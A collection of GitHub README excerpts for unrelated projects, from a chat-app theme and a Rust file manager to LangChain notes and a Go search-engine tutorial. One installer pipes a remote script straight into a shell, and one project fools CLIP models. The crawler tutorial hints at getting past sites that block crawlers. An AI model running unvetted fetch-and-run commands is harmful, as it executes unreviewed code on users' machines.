Release](https://github.com/wibus-wee/icalingua-theme-telegram/releases) 下载最新的构建版本。 2. 将 `addon.js`, `style.css`, `main.js`, `config.js` 复制到 Icalingua++ 的[数据目录](https://github.com/Icalingua-plus-plus/Icalingua-plus-plus#%E9%BB%98%E8%AE%A4%E6%95%B0%E6%8D%AE%E7%9B%AE%E5%BD%95) 3. 重启 Icalingua++。 #### 从源码安装 1. 克隆这个仓库。 2. 安装依赖 `pnpm install`。 3. 给予执行权限 `chmod +x dist/install.sh`。 4. 运行 `cd dist && ./install.sh`。 5. 重启 Icalingua++。 ## Enhancements & Feat. | 增强 & 新功能 这个文件用于帮助一些由于 DOM 结构的原因无法直接通过改变 CSS 实现目标样式的元素。已经实现的功能有: - [x] 获取 ChatGroup 的宽度以改变 ChatGroup Aside 为 Telegram 风格的头部菜单栏。 - [x] 合并同一联系人的多条消息为一条。 - [x] 更好的图片信息显示效果。(仅针对单张图片消息) - [x] 移除回复消息的图标并改为点击即可回复消息的样式。 - [x] 为每个用户名分配不同的颜色。 - [x] 自动重载 CSS 和 JS 文件。 - [x] 手动控制功能启动功能。 - [ ] 全新的图像显示器。 - [ ] 主题自动更新器。 - [ ] 用 Telegram 风格的图标替换图标。 - [ ] 更改模态框的样式,使其更加美观。 - [ ] 鼠标滑动以回复消息 ## Config | 配置 在 [#32](https://github.com/wibus-wee/icalingua-theme-telegram/pull/32) 中,我们引入了一个新的配置文件 `config.js`,你可以在这个文件中配置你想要启动的功能。有关这个文件的配置项定义,你可以前往 [types.d.ts](./types.d.ts) 查看。在此我简单介绍一下配置项: > **Note** > > **不知道咋写的先学下 JavaScript 吧,或者将 `manual` 设置为 false,这样所有功能都会启动。** ### core -- 启动的核心功能 你可以去前往 [core](./src/core//index.ts) 查看所有的核心功能。你需要填入的是核心功能的 Key。如: 在文件里有一行代码: ```ts "modify-chat-box-interval": modifyChatBoxInterval, ``` 我想启动这个功能,那么你在 config.js 的 core 中需要填入的是 [`modify-chat-box-interval`],以此类推。 ### chatbox --- 启动的聊天框修改功能 与 [core](#core----启动的核心功能) 类似,你可以去前往 [chatbox](./src/functions/index.ts) 查看所有的聊天框修改功能。你需要填入的是聊天框修改功能的 Key。 ### 其他注意事项 - 你可以在 `config.js` 中设置 `manual` 为 `false` 来启动所有功能。 - 当 `dev` 为 `true` 且你启动了 `fileChangesListener` 时,当你对 JS 文件进行修改时,Icalingua++ 会自动重载窗口,对 CSS 文件修改时,Icalingua++ 会自动重载 CSS 文件。 - 当 `dev` 为 `true` 时,全部功能都会启动,你无法通过 `manual` 或其他办法来关闭功能(除了删代码 🙂)。 - 修改了 `config.js` 后,你需要重启 / 重载 Icalingua++ 才能使配置生效。 - 你如果“不小心”填错了功能的 Key,你大可以放心这个功能是不会被启动的,并且在控制台会有错误警告。 - 如果你对这种**控制台乱拉屎**的行为非常厌恶 🤬,你可以将 `log` 设置为 `false` 来关闭控制台输出。 ## Preview |Light|Dark| |---|---| |<img alt="light" src="https://github.com/wibus-wee/icalingua-theme-telegram/assets/62133302/841d7e5e-5e82-4373-9983-f61903879c86">|<img alt="dark" src="https://github.com/wibus-wee/icalingua-theme-telegram/assets/62133302/e07826bd-99a8-49fb-96b6-c7dad19cf16e">| ## Author Telegram Theme For Icalingua++ © Wibus, Released under AGPLv3. Created on Jul 1, 2023 > [Personal Website](http://wibus.ren/) · [Blog](https://blog.wibus.ren/) · GitHub [@wibus-wee](https://github.com/wibus-wee/) · Telegram [@wibus✪](https://t.me/wibus_wee)
matfrei/CLIPMasterPrints
https://github.com/matfrei/CLIPMasterPrints
Code for CLIPMasterPrints: Fooling Contrastive Language-Image Pre-training Using Latent Variable Evolution
# CLIPMasterPrints: Fooling Contrastive Language-Image Pre-training Using Latent Variable Evolution [![Paper](https://img.shields.io/badge/paper-arxiv.2307.03798-B31B1B.svg)](https://arxiv.org/abs/2307.03798) ![alt text](static/demo.gif) Installation ------- clipmasterprints builds upon the stable diffusion conda enviroment and decoder model. To run the code in the repository, you need to download and set up both: ``` mkdir external cd external # clone repository git clone https://github.com/CompVis/stable-diffusion.git # get correct commit git checkout 69ae4b35e0a0f6ee1af8bb9a5d0016ccb27e36dc # created and activate conda env with SD dependencies cd stable-diffusion conda env create -f environment.yaml conda activate ldm # install SD from source into conda env pip install -e . # move previously downloaded SD sd-v1-4.ckpt into correct folder # (Refer to https://github.com/CompVis/ for where to download the checkpoint) ln -s <path/to/sd-v1-4.ckpt> models/ldm/stable-diffusion-v1/model.ckpt # return to base dir cd ../.. ``` After all Stable Diffusion dependencies are installed, install the package from source using ``` git clone https://github.com/matfrei/CLIPMasterPrints.git cd CLIPMasterPrints pip install -e . ``` Mining and evaluating CLIPMasterPrints ------- To mine fooling master images, use ``` python train/mine.py --config-path config/<config-name>.yaml ``` where ```<config-name>``` is a placeholder for the desired config file. Use ```cmp_artworks.yaml``` to target artwork captions or ```cmp_imagenet_classes_*.yaml``` to reproduce our experiments on imagenet class captions. To display some plots for mined images, execute ``` python eval/eval_results.py ``` Authors ------- Matthias Freiberger <[email protected]> Peter Kun <[email protected]> Anders Sundnes Løvlie <[email protected]> Sebastian Risi <[email protected]> Citation ------ If you use the code for academic or commecial use, please cite the associated paper: ``` @misc{https://doi.org/10.48550/arXiv.2307.03798, doi = {10.48550/ARXIV.2307.03798}, url = {https://arxiv.org/abs/2307.03798}, author = {Freiberger, Matthias and Kun, Peter and Løvlie, Anders Sundnes and Risi, Sebastian}, title = {CLIPMasterPrints: Fooling Contrastive Language-Image Pre-training Using Latent Variable Evolution}, publisher = {arXiv}, year = {2023}, }
sxyazi/yazi
https://github.com/sxyazi/yazi
⚡️ Blazing fast terminal file manager written in Rust, based on async I/O.
## Yazi - ⚡️ Blazing Fast Terminal File Manager Yazi ("duck" in Chinese) is a terminal file manager written in Rust, based on non-blocking async I/O. It aims to provide an efficient, user-friendly, and configurable file management experience. https://github.com/sxyazi/yazi/assets/17523360/740a41f4-3d24-4287-952c-3aec51520a32 ⚠️ Note: Yazi is currently in active development and may be unstable. The API is subject to change without prior notice. ## Installation Before getting started, ensure that the following dependencies are installed on your system: - nerd-fonts (required, for icons) - jq (optional, for JSON preview) - unar (optional, for archive preview) - ffmpegthumbnailer (optional, for video thumbnails) - fd (optional, for file searching) - rg (optional, for file content searching) - fzf (optional, for directory jumping) - zoxide (optional, for directory jumping) ### Arch Linux Install with paru or your favorite AUR helper: ```bash paru -S yazi jq unarchiver ffmpegthumbnailer fd ripgrep fzf zoxide ``` ### macOS Install the dependencies with Homebrew: ```bash brew install jq unar ffmpegthumbnailer fd ripgrep fzf zoxide brew tap homebrew/cask-fonts && brew install --cask font-symbols-only-nerd-font ``` And download the latest release [from here](https://github.com/sxyazi/yazi/releases). Or you can install Yazi via cargo: ```bash cargo install --git https://github.com/sxyazi/yazi.git ``` ### Nix Nix users can install Yazi from [the NUR](https://github.com/nix-community/nur-combined/blob/master/repos/xyenon/pkgs/yazi/default.nix): ```bash nix-env -iA nur.repos.xyenon.yazi ``` Or add the following to your configuration: ```nix # configuration.nix environment.systemPackages = with pkgs; [ nur.repos.xyenon.yazi ]; ``` ### Build from source Execute the following commands to clone the project and build Yazi: ```bash git clone https://github.com/sxyazi/yazi.git cd yazi cargo build --release ``` Then, you can run: ```bash ./target/release/yazi ``` ## Usage ```bash yazi ``` If you want to use your own config, copy the [config folder](https://github.com/sxyazi/yazi/tree/main/config) to `~/.config/yazi`, and modify it as you like. ## Image Preview | Platform | Protocol | Support | | ------------- | -------------------------------------------------------------------------------- | --------------------- | | Kitty | [Terminal graphics protocol](https://sw.kovidgoyal.net/kitty/graphics-protocol/) | ✅ Built-in | | WezTerm | [Terminal graphics protocol](https://sw.kovidgoyal.net/kitty/graphics-protocol/) | ✅ Built-in | | Konsole | [Terminal graphics protocol](https://sw.kovidgoyal.net/kitty/graphics-protocol/) | ✅ Built-in | | iTerm2 | [Inline Images Protocol](https://iterm2.com/documentation-images.html) | ✅ Built-in | | Hyper | Sixel | ☑️ Überzug++ required | | foot | Sixel | ☑️ Überzug++ required | | X11 / Wayland | Window system protocol | ☑️ Überzug++ required | | Fallback | [Chafa](https://hpjansson.org/chafa/) | ☑️ Überzug++ required | Yazi automatically selects the appropriate preview method for you, based on the priority from top to bottom. That's relying on the `$TERM`, `$TERM_PROGRAM`, and `$XDG_SESSION_TYPE` variables, make sure you don't overwrite them by mistake! For instance, if your terminal is Alacritty, which doesn't support displaying images itself, but you are running on an X11/Wayland environment, it will automatically use the "Window system protocol" to display images -- this requires you to have [Überzug++](https://github.com/jstkdng/ueberzugpp) installed. ## TODO - [x] Add example config for general usage, currently please see my [another repo](https://github.com/sxyazi/dotfiles/tree/main/yazi) instead - [x] Integration with fzf, zoxide for fast directory navigation - [x] Integration with fd, rg for fuzzy file searching - [x] Documentation of commands and options - [x] Support for Überzug++ for image previews with X11/wayland environment - [ ] Batch renaming support ## License Yazi is MIT licensed.
mani-sh-reddy/Lunar-Lemmy-iOS
https://github.com/mani-sh-reddy/Lunar-Lemmy-iOS
Lunar is an iOS app that serves as a client for Lemmy, the open-source federated alternative to Reddit
# Lunar - An iOS Client for Lemmy [![GitHub release](https://img.shields.io/github/v/release/mani-sh-reddy/Lunar-Lemmy-iOS)](https://github.com/mani-sh-reddy/Lunar-Lemmy-iOS/releases) ![Cocoapods platforms](https://img.shields.io/cocoapods/p/ios) [![Static Badge](https://img.shields.io/badge/Swift-5.9-orange?logo=swift&logoColor=orange)](https://www.swift.org/about/) [![Static Badge](https://img.shields.io/badge/SwiftUI-3.0-blue?logo=swift&logoColor=blue) ](https://developer.apple.com/xcode/swiftui/) [![GitHub last commit (branch)](https://img.shields.io/github/last-commit/mani-sh-reddy/Lunar-Lemmy-iOS/dev)](https://github.com/mani-sh-reddy/Lunar-Lemmy-iOS/commits/main) [![license: GPL v3](https://img.shields.io/badge/license-GPLv3-maroon.svg)](https://www.gnu.org/licenses/gpl-3.0) Lunar is an iOS app that serves as a client for [Lemmy, the open-source federated alternative to Reddit](https://join-lemmy.org/instances) ![Lunar App Screenshots](Screenshots/LunarIconScreenshots.png) ## Getting Started Lunar is currently in its alpha testing phase and, as a result, it has not been released on the app store or TestFlight yet. However, you can still install Lunar on your iOS device by following these steps: 1. Ensure you have an Apple developer account. If you don't have one, you can create a free developer account by visiting this link: https://developer.apple.com 2. Clone the Lunar repository and open Lunar.xcodeproj. 3. In Xcode, select your project, go to the "General" tab, and choose "Automatically manage signing" and your personal team. 4. Connect your iPhone to your computer and select it as the run destination. 5. Run your project. After a successful build, you might encounter an error in Xcode stating that your app is not from a trustworthy source. 6. To resolve this issue, navigate to your device's Settings, search for "Device Management," select your profile name, and then click "Trust." 7. Now, you can run your app again, and it should work without any issues. ## Components [Alamofire](https://github.com/Alamofire/Alamofire) - Elegant HTTP Networking in Swift [Kingfisher](https://github.com/onevcat/Kingfisher) - A lightweight, pure-Swift library for downloading and caching images from the web. ## Contributing Contributions are welcome! If you would like to contribute, please create a pull request with your changes. ## License Lunar is released under the [GPL-3.0 license](https://choosealicense.com/licenses/gpl-3.0/). See the `LICENSE` file for more information. ## Contact If you would like to give feedback or any suggestions, please open a [discussion](https://github.com/mani-sh-reddy/Lunar-Lemmy-iOS/discussions).
codingburgas/2223-otj-10-project-python-web-scraper-GSTabanov20
https://github.com/codingburgas/2223-otj-10-project-python-web-scraper-GSTabanov20
2223-otj-10-project-python-web-scraper-GSTabanov20 created by GitHub Classroom
## Cryptocurrency Data Display This Python script fetches data from the CoinMarketCap website and displays information about popular cryptocurrencies, trending cryptocurrencies, top gainers, and top losers. The data is scraped using the `requests` library and parsed using the `BeautifulSoup` library. ## Installation To run this script, you need to have Python installed on your system. ### Dependencies The following libraries are required to run the script: - `requests`: Used to send HTTP requests and fetch the webpage content. - `beautifulsoup4`: Used to parse the HTML content and extract data from it. You can install these libraries using the following command: pip install requests beautifulsoup4 Make sure you have pip installed and it is up to date. If you don't have pip installed, you can refer to the official Python documentation for instructions on how to install it. ## Usage Once you have installed the required libraries, you can run the script by executing the following command: ```python python main.py ``` The script will fetch the data from the CoinMarketCap website and display a menu with the following options: 1. Popular Cryptocurrencies 2. Trending Cryptocurrencies (currently under development) 3. Top Gainers (currently under development) 4. Top Losers (currently under development) To select an option, enter the corresponding number and press Enter. Option 1 will display information about popular cryptocurrencies, including their names, prices, and 24-hour trading volumes. After displaying the information, you will be prompted with two options: to go back to the menu or exit the script. Options 2, 3, and 4 are currently under development and will display a message indicating that. You will be presented with the same options to go back to the menu or exit the script. If you enter an invalid choice, an error message will be displayed, and you will be prompted to enter a valid choice. ## Disclaimer This script fetches data from the CoinMarketCap website, which is a third-party platform. The availability and accuracy of the data depend on the CoinMarketCap website's stability and functionality. OpenAI and the author of this script do not guarantee the availability or accuracy of the data displayed by the script. Please use this script responsibly and adhere to any applicable terms of service or usage guidelines provided by CoinMarketCap. ## Contributions Contributions to this script are welcome. If you have any suggestions or improvements, feel free to fork the script's repository and submit a pull request with your changes.
profclems/compozify
https://github.com/profclems/compozify
Convert "docker run" commands to docker compose files
# Compozify Compozify is a simple (yet complicated) tool to generate a `docker-compose.yml` file from a `docker run` command. # Usage ## Screenshot ![image](https://github.com/profclems/compozify/assets/41906128/bcd27512-8692-44f3-9113-63bfb112e38e) ## Installation Download a binary suitable for your OS at the [releases page](https://github.com/profclems/compozify/releases/latest). ### Quick install #### Linux and macOS ```sh curl -sfL https://raw.githubusercontent.com/profclems/compozify/main/install.sh | sh ``` #### Windows (PowerShell) Open a PowerShell terminal (version 5.1 or later) and run: ```powershell Set-ExecutionPolicy RemoteSigned -Scope CurrentUser # Optional: Needed to run a remote script the first time irm https://raw.githubusercontent.com/profclems/compozify/main/install.ps1 | iex ``` ### From source #### Prerequisites for building from source - `make` - Go 1.18+ 1. Verify that you have Go 1.18+ installed ```sh go version ``` If `go` is not installed, follow instructions on [the Go website](https://golang.org/doc/install). 2. Clone this repository ```sh git clone https://github.com/profclems/compozify.git cd compozify ``` If you have `$GOPATH/bin` or `$GOBIN` in your `$PATH`, you can just install with `make install` (install compozify in `$GOPATH/bin`) and **skip steps 3 and 4**. 3. Build the project ```sh make build ``` 4. Change PATH to find newly compiled `compozify` ```sh export PATH=$PWD/bin:$PATH ``` 4. Run `compozify --version` to confirm that it worked ## License Copyright © [Clement Sam](https://twitter.com/clems_dev) `compozify` is open-sourced software licensed under the [MIT](LICENSE) license.
avikumart/LLM-GenAI-Transformers-Notebooks
https://github.com/avikumart/LLM-GenAI-Transformers-Notebooks
An repository containing all the LLM notebooks with tutorial and projects
# LLM-GenAI-Transformers-Notebooks A repository containing all the LLM notebooks with tutorials and projects ### The focus area of this repository: 1. Transformers tutorial and notebooks 2. LLM notebooks and their applications 3. Tools and technologies of GenAI 4. Courses List in GenAI 5. Generative AI Blogs/Articles 🤖Contributions are welcome...
taishan1994/langchain-learning
https://github.com/taishan1994/langchain-learning
langchain学习笔记,包含langchain源码解读、langchain中使用中文模型、langchain实例等。
# langchain-learning langchain的学习笔记。依赖: ```python openai==0.27.8 langchian==0.0.225 ``` 和langchain相类似的一些工具: - [danswer-ai/danswer: Ask Questions in natural language and get Answers backed by private sources. Connects to tools like Slack, GitHub, Confluence, etc.](https://github.com/danswer-ai/danswer) ## **文章** **注意:由于langchain或langchain-ChatGLM的更新,可能导致部分源码和讲解的有所差异。** 有的一些文章直接放的是一些链接,从网上收集整理而来。 **** - langchain组件-数据连接(data connection) - langchain组件-模型IO(model IO) - langchain组件-链(chains) - langchain组件-代理(agents) - langchain组件-内存(memory) - langchain组件-回调(callbacks) - langchain中ChatOpenAI背后做了什么.md - langchain.load.serializable.py.md - langchain中的一些schema.md - langchain中是怎么调用chatgpt的接口的.md - langchain结构化输出背后的原理,md - langchain中memory的工作原理.md - langchain怎么确保输出符合道德期望.md - langchain中路由链LLMRouterChain的原理.md - langchain中的EmbeddingRouterChain原理.md - langchain集成GPTCache.md - langchain集成Mivus向量数据库.md - langchain中的StreamingStdOutCallbackHandler原理.md - pydantic中config的一些配置.md - pydantic中的Serializable和root_validator.md - python中常用的一些魔术方法.md - python的typing常用的类型.md - python中functools的partial的用法.md - python中inspect的signature用法.md - python中args和kwargs.md - [我为什么放弃了 LangChain? - 知乎 (zhihu.com)](https://zhuanlan.zhihu.com/p/645358531) 目前基于langchain的中文项目有两个: - https://github.com/yanqiangmiffy/Chinese-LangChain - https://github.com/imClumsyPanda/langchain-ChatGLM 我们从中可以学到不少。 #### langchain-ChatGLM - 使用api部署langchain-chatglm的基本原理.md - 上传文档时发生了什么.md - 关于HuggingFaceEmbeddings.md - 关于InMemoryDocstore.md - 关于CharacterTextSplitter.md - 关于TextLoader.md - 关于怎么调用bing的搜索接口.md - 根据query得到相关的doc的原理.md - 根据查询出的docs和query生成prompt.md - 根据prompt用模型生成结果.md - [ChatGPT小型平替之ChatGLM-6B本地化部署、接入本地知识库体验 | 京东云技术团队](https://juejin.cn/post/7246408135015415868) ## **中文例子** - 定制中文LLM模型 - 定制中文聊天模型 - 使用中文splitter.md - 根据query查询docs.md - mini-langchain-ChatGLM.md - 打造简易版类小爱同学助手.md - chatglm实现agent控制.md - [向量检索增强chatglm生成-结合ES](https://zhuanlan.zhihu.com/p/644619003) - [知识图谱抽取LLM - 知乎 (zhihu.com)](https://zhuanlan.zhihu.com/p/645509983) ## **英文例子** - langchain使用openai例子.md(文本翻译) - openai调用chatgpt例子.md - langchain解析结果并格式化输出.md - langchain带有记忆的对话.md - langchain中使用不同链.md - langchain基于文档的问答md - [使用GGML和LangChain在CPU上运行量化的llama2](https://zhuanlan.zhihu.com/p/644701608) - [本地部署开源大模型的完整教程:LangChain + Streamlit+ Llama - 知乎 (zhihu.com)](https://zhuanlan.zhihu.com/p/639565332) ## prompt工程.md 一个优化的prompt对结果至关重要,感兴趣的可以去看看这个。 [yzfly/LangGPT: LangGPT: Empowering everyone to become a prompt expert!🚀 Structured Prompt,结构化提示词。 (github.com)](https://github.com/yzfly/LangGPT):构建结构化的高质量prompt ## **langchain可能存在一些问题** 虽然langchain给我们提供了一些便利,但是也存在一些问题: - **无法解决大模型基础技术问题,主要是prompt重用问题**:首先很多大模型应用的问题都是大模型基础技术的缺陷,并不是LangChain能够解决的。其中核心的问题是大模型的开发主要工作是prompt工程。而这一点的重用性很低。但是,这些功能都**需要非常定制的手写prompt**。链中的每一步都需要手写prompt。输入数据必须以非常特定的方式格式化,以生成该功能/链步骤的良好输出。设置DAG编排来运行这些链的部分只占工作的5%,95%的工作实际上只是在提示调整和数据序列化格式上。这些东西都是**不可重用**的。 - **LangChain糟糕的抽象与隐藏的垃圾prompt造成开发的困难**:简单说,就是LangChain的抽象工作不够好,所以很多步骤需要自己构建。而且LangChain内置的很多prompt都很差,不如自己构造,但是它们又隐藏了这些默认prompt。 - **LangChain框架很难debug**:**尽管LangChain很多方法提供打印详细信息的参数,但是实际上它们并没有很多有价值的信息**。例如,如果你想看到实际的prompt或者LLM查询等,都是十分困难的。原因和刚才一样,LangChain大多数时候都是隐藏了自己内部的prompt。所以如果你使用LangChain开发效果不好,你想去调试代码看看哪些prompt有问题,那就很难。 - **LangChain鼓励工具锁定**:LangChain鼓励用户在其平台上进行开发和操作,但是如果用户需要进行一些LangChain文档中没有涵盖的工作流程,即使有自定义代理,也很难进行修改。这就意味着,一旦用户开始使用LangChain,他们可能会发现自己被限制在LangChain的特定工具和功能中,而无法轻易地切换到其他可能更适合他们需求的工具或平台。 以上内容来自: - [Langchain Is Pointless | Hacker News (ycombinator.com)](https://news.ycombinator.com/item?id=36645575) - [使用LangChain做大模型开发的一些问题:来自Hacker News的激烈讨论~](https://zhuanlan.zhihu.com/p/642498874) 有时候一些简单的任务,我们完全可以自己去实现相关的流程,这样**每一部分都由我们自己把控**,更易于修改。 # 使用langchain解决复杂任务 ## 方法一:领域微调LLM 使用领域数据对LLM进行微调,受限于计算资源和模型参数的大小,而且模型会存在胡言乱语的情况。这里面涉及到一系列的问题: - 数据怎么获取,怎么进行数据清理。 - 分词使用什么方式。 - 模型采用什么架构,怎么训练,怎么评估模型。 - 模型怎么进行有效推理,怎么进行部署。 - 领域预训练、领域指令微调、奖励模型、结果对齐。 ## 方法二:langchain + LLM + tools 基本思路: 1、用户提问:请对比下商品雅诗兰黛特润修护肌活精华露和SK-II护肤精华? 2、RouterChain问题路由,即使用哪种方式回答问题:(调用一次LLM) - RouterChain可以是一个LLM,也可以是一个embedding,去匹配到合适的解决方案,如果没有匹配到任何解决方案,则使用模型内部知识进行回答。 - 这里匹配到**商品对比**这一问题,得到解决方案:(1)调用商品搜索工具得到每一个商品的介绍。(2)通过搜索结果对比这些商品。 3、使用Planner生成step:(调用一次LLM) - 根据解决方案生成合适的steps,比如:(1)搜索雅诗兰黛特润修护肌活精华露。(2)搜索SK-II护肤精华。(3)对比上述商品。 4、执行者Executer执行上述步骤:(调用steps次LLM,n是超参数表明调用的最大次数) - 需要提供工具,每个step的问题,需要调用llm生成每个工具的调用参数。 - 调用工具获取结果。 5、对所有的结果进行汇总。(调用一次LLM) ## 方法三:langchain + LLM + 检索 相比于方案1,不使用工具,直接根据问题进行对数据库进行检索,然后对检索到的结果进行回答。 检索的方式可以是基于给定问题的关键字,使用ES工具从海量数据库中检索到可能存在答案的topk段落。把这topk个段落连同问题一起发送给LLM,进行回答。 检索的方式改成向量的形式,先对所有已知资料按照300个字切分成小的段落,然后对这些段落进行编码成向量,当用户提问时,把用户问题同样编码成向量,然后对这些段落进行检索,得到topk最相关的段落,把这topk个段落连同问题一起发送给LLM,进行回答。 ![图片](README.assets/640.png) **上述方法的优缺点:** **领域微调LLM**:需要耗费很多的人力收集领域内数据和问答对,需要耗费很多算力进行微调。 **langchain + LLM + tools**:是把LLM作为一个子的服务,LangChain作为计划者和执行者的大脑,合适的时机调用LLM,优点是解决复杂问题,缺点是不可靠。LLM生成根据问题和工具调用工具获取数据时不可靠。可以不能很好的利用工具。可能不能按照指令调用合适的工具,还可能设定计划差,难以控制。优点是:用于解决复杂的问题。 **langchain + LLM + 检索**:优点是现在的领域内主流问答结构,缺点:是根据问题对可能包含答案的段落检索时可能检索不准。不适用于复杂问答 **总结:最大的问题还是LLM本身:** - LLM输出的不可控性,会导致后续步骤出现偏差。 - LLM的输入的context的长度问题:目前已经可以把长度推广到10亿以上了。 - 训练一个LLM需要的成本:对于数据而言,除了人工收集整理外,也可以使用大模型进行生成;对于训练而言,目前也有不少基于参数有效微调的例子。 - LLM的部署问题:也已经有不少加速推理的方法,比如量化、压缩、使用分布式进行部署、使用C++进行部署等。 LLM是整个系统的基座,目前还是有不少选择的余地的,网上开源了不少中文大语言模型,但大多都是6B/7B/13B的,要想有一个聪明的大脑,模型的参数量还是需要有保证的。 以上参考:[https://mp.weixin.qq.com/s/FvRchiT0c0xHYscO_D-sdA](https://python.langchain.com.cn/docs/modules/agents/how_to/custom_llm_chat_agent) # 扩展 留出一些问题以待思考:可能和langchain相关,也可能和大模型相关 - **怎么根据垂直领域的数据选择中文大模型?**1、是否可以商用。2、根据各评测的排行版。3、在自己领域数据上进行评测。4、借鉴现有的垂直领域模型的选择,比如金融大模型、法律大模型、医疗大模型等。 - **数据的一个答案由一系列相连的句子构成,怎么对文本进行切分以获得完整的答案?**比如: ```python 怎么能够解决失眠? 1、保持良好的心情; 2、进行适当的训练。 3、可适当使用药物。 ``` 1、尽量将划分的文本的长度设置大一些。2、为了避免答案被分割,可以设置不同段之间可以重复一定的文本。3、检索时可返回前top_k个文档。4、融合查询出的多个文本,利用LLM进行总结。 - **怎么构建垂直领域的embedding?** - **怎么存储获得的embedding?** - **如何引导LLM更好的思考?** 可使用:**chain of thoughts、self ask、ReAct**,具体介绍可以看这一篇文章:https://zhuanlan.zhihu.com/p/622617292 实际上,langchain中就使用了ReAct这一策略。 # 参考 > [Introduction | 🦜️🔗 Langchain](https://python.langchain.com/docs/get_started/introduction.html) > > [API Reference — 🦜🔗 LangChain 0.0.229](https://api.python.langchain.com/en/latest/api_reference.html) > > [https://mp.weixin.qq.com/s/FvRchiT0c0xHYscO_D-sdA](https://python.langchain.com.cn/docs/modules/agents/how_to/custom_llm_chat_agent) > > https://python.langchain.com.cn/docs/modules/agents/how_to/custom_llm_chat_agent
johnlui/DIYSearchEngine
https://github.com/johnlui/DIYSearchEngine
🔍 Go 开发的开源互联网搜索引擎,附教程《自己动手开发互联网搜索引擎》
# Go 开发的开源互联网搜索引擎 DIYSearchEngine 是一个能够高速采集海量互联网数据的开源搜索引擎,采用 Go 语言开发。 > #### 想运行本项目请拉到项目底部,有[教程](#本项目运行方法)。 <br> <h2 align="center">《两万字教你自己动手开发互联网搜索引擎》</h2> ## 写在前面 本文是一篇教你做“合法搜索引擎”的文章,一切都符合《网络安全法》和 robots 业界规范的要求,如果你被公司要求爬一些上了反扒措施的网站,我个人建议你马上离职,我已经知道了好几起全公司数百人被一锅端的事件。 ## 《爬乙己》 搜索引擎圈的格局,是和别处不同的:只需稍作一番查考,便能获取一篇又一篇八股文,篇篇都是爬虫、索引、排序三板斧。可是这三板斧到底该怎么用代码写出来,却被作者们故意保持沉默,大抵可能确实是抄来的罢。 从我年方二十,便开始在新浪云计算店担任一名伙计,老板告诉我,我长相过于天真,无法应对那些难缠的云计算客户。这些客户时刻都要求我们的服务在线,每当出现故障,不到十秒钟电话就会纷至沓来,比我们的监控系统还要迅捷。所以过了几天,掌柜又说我干不了这事。幸亏云商店那边要人,无须辞退,便改为专管云商店运营的一种无聊职务了。 我从此便整天的坐在电话后面,专管我的职务。虽然只需要挨骂道歉,损失一些尊严,但总觉得有些无聊。掌柜是一副凶脸孔,主顾也没有好声气,教人活泼不得;只有在午饭后,众人一起散步时闲谈起搜索引擎,才能感受到几许欢笑,因此至今仍深刻铭记在心。 由于谷歌被戏称为“哥”,本镇居民就为当地的搜索引擎取了一个绰号,叫作度娘。 度娘一出现,所有人都笑了起来,有的叫到,“度娘,你昨天又加法律法规词了!”他不回答,对后台说,“温两个热搜,要一碟文库豆”,说着便排出九枚广告。我们又故意的高声嚷道,“你一定又骗了人家的钱了!”度娘睁大眼睛说,“你怎么这样凭空污人清白……”“什么清白?我前天亲眼见你卖了莆田系广告,第一屏全是。”度娘便涨红了脸,额上的青筋条条绽出,争辩道,“广告不能算偷……流量!……互联网广告的事,能算偷么?”接连便是难懂的话,什么“免费使用”,什么“CPM”之类,引得众人都哄笑起来:店内外充满了快活的空气。 ## 本文目标 三板斧文章遍地都是,但是真的自己开发出来搜索引擎的人却少之又少,其实,开发一个搜索引擎没那么难,数据量也没有你想象的那么大,倒排索引也没有字面上看着那么炫酷,BM25 算法也没有它的表达式看起来那么夸张,只给几个人用的话也没多少计算压力。 突破自己心灵的枷锁,只靠自己就可以开发一个私有的互联网搜索引擎! 本文是一篇“跟我做”文章,只要你一步一步跟着我做,最后就可以得到一个可以运行的互联网搜索引擎。本文的后端语言采用 Golang,内存数据库采用 Redis,字典存储采用 MySQL,不用费尽心思地研究进程间通信,也不用绞尽脑汁地解决多线程和线程安全问题,也不用自己在磁盘上手搓 B+ 树致密排列,站着就把钱挣了。 ## 目录 把大象装进冰箱,只需要三步: 1. 编写高性能爬虫,从互联网上爬取网页 2. 使用倒排索引技术,将网页拆分成字典 3. 使用 BM25 算法,返回搜索结果 ## 第一步,编写高性能爬虫,从互联网上爬取网页 Golang 的协程使得它特别适合拿来开发高性能爬虫,只要利用外部 Redis 做好“协程间通信”,你有多少 CPU 核心 go 都可以吃完,而且代码写起来还特别简单,进程和线程都不需要自己管理。当然,协程功能强大,代码简略,这就导致它的 debug 成本很高:我在写协程代码的时候感觉自己像在炼丹,修改一个字符就可以让程序从龟速提升到十万倍,简直比操控 ChatGPT 还神奇。 在编写爬虫之前,我们需要知道从互联网上爬取内容需要遵纪守法,并遵守`robots.txt`,否则,可能就要进去和前辈们切磋爬虫技术了。robots.txt 的具体规范大家可以自行搜索,下面跟着我开搞。 新建 go 项目我就不演示了,不会的可以问一下 ChatGPT~ ### 爬虫工作流程 我们先设计一个可以落地的爬虫工作流程。 #### 1. 设计一个 UA 首先我们要给自己的爬虫设定一个 UA,尽量采用较新的 PC 浏览器的 UA 加以改造,加入我们自己的 spider 名称,我的项目叫“Enterprise Search Engine” 简称 ESE,所以我设定的 UA 是 `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4280.67 Safari/537.36 ESESpider/1.0`,你们可以自己设定。 需要注意的是,部分网站会屏蔽非头部搜索引擎的爬虫,这个需要你们转动聪明的小脑袋瓜自己解决哦。 #### 2. 选择一个爬虫工具库 我选择的是 [PuerkitoBio/goquery](https://github.com/PuerkitoBio/goquery),它支持自定义 UA 爬取,并可以对爬到的 HTML 页面进行解析,进而得到对我们的搜索引擎十分重要的页面标题、超链接等。 #### 3. 设计数据库 爬虫的数据库倒是特别简单,一个表即可。这个表里面存着页面的 URL 和爬来的标题以及网页文字内容。 ```sql CREATE TABLE `pages` ( `id` int unsigned NOT NULL AUTO_INCREMENT, `url` varchar(768) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT '网页链接', `host` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT '域名', `dic_done` tinyint DEFAULT '0' COMMENT '已拆分进词典', `craw_done` tinyint NOT NULL DEFAULT '0' COMMENT '已爬', `craw_time` timestamp NOT NULL DEFAULT '2001-01-01 00:00:00' COMMENT '爬取时刻', `origin_title` varchar(2000) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT '上级页面超链接文字', `referrer_id` int NOT NULL DEFAULT '0' COMMENT 